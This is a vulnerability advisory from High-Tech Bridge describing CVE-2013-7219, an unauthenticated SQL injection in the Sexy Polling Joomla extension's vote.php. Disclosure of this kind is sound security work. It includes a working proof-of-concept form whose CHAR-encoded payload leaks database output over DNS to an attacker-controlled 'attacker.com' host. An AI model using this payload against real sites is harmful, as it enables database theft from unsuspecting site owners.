SQL Injection in Sexy Polling Joomla Extension

2013-12-26T00:00:00
ID HTB23193
Type htbridge
Reporter High-Tech Bridge
Modified 2014-01-09T00:00:00

Description

High-Tech Bridge Security Research Lab discovered vulnerability in Sexy Polling Joomla Extension, which can be exploited to perform SQL Injection attacks.

1) SQL Injection in Sexy Polling Joomla Extension: CVE-2013-7219
The vulnerability exists due to insufficient validation of "answer_id[]" HTTP POST parameter passed to "/components/com_sexypolling/vote.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.
The following exploitation example is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for version() (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
<form action="http://[host]/components/com_sexypolling/vote.php"
method="post" name="main">
<input type="hidden" name="answer_id[]" value="',(select load_file(CONCAT(CHAR(92),CHAR(92),(select
version()),CHAR(46),CHAR(97),CHA R(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CH AR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),C HAR(97),CHAR(114)))),'','','','','')
-- ">
<input type="submit" id="btn">
</form>